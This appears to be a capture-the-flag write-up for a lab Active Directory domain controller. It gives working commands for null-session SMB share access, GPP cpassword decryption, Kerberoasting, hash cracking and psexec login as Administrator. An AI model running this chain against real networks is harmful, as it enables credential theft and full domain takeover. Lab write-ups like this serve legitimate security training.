Enumeration

1
export target=10.129.47.148

Port Scanning

1
2
3
rustscan $target --ulimit 10000 -g

10.129.47.148 -> [53,88,135,139,389,445,593,636,3268,3269,5722,464,9389,49153,49152,49155,49154,49158,49157,49162,49166,49168]
1
nmap -Pn -sC -sV -n -p53,88,135,139,389,445,464,3268,3269,5722,9389,47001,49152,49154,49153,49155,49158,49157,49162,49166,49168 -T5 $target

Looking at the open ports (53, 88, …) this is clearly a Domain Controller.

SMB Shares

1
smbmap -H $target

We can read the non-default Replication share with null authentication.

Let’s read it with smbclient:

1
smbclient -N //$target/Replication

Get all files:

1
2
3
4
5
6
7
8
9
smbclient -N //$target/Replication

smb: \> cd active.htb

smb: \> prompt OFF

smb: \> recurse ON

smb: \> mget *

Look at the all files with tree ., we see that there is a Groups.xml file. It may contains cpassword:

Read it: The credential belongs to svc_tgs.

Decrypt the cpassword

1
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'

Test it with netexec:

Kerberoasting

Observe the owned user is a service account, we can use it kerberoasting:

1
impacket-GetUserSPNs active.htb/svc_tgs:'GPPstillStandingStrong2k18' -dc-ip $target

Request the ticket:

1
impacket-GetUserSPNs active.htb/svc_tgs:'GPPstillStandingStrong2k18' -dc-ip $target -request

Get the hash into a file:

1
echo '$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrat.. <SNIP> ...3b6'> hash 

Then crack it with hashcat:

1
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt

We got the Administrator credentials.

Connect with psexec:

1
impacket-psexec Administrator:'<SNIP>'@$target

Key Takeaways

  • Check SMB shares accessible via null session for GPP files like Groups.xml; use gpp-decrypt to crack cpassword values.
  • If the compromised account is a service account (has an SPN), attempt Kerberoasting to obtain hashes of more privileged accounts.
  • Recognize Domain Controller indicators by open ports (53, 88, 389, 636); these ports directly define the AD attack surface.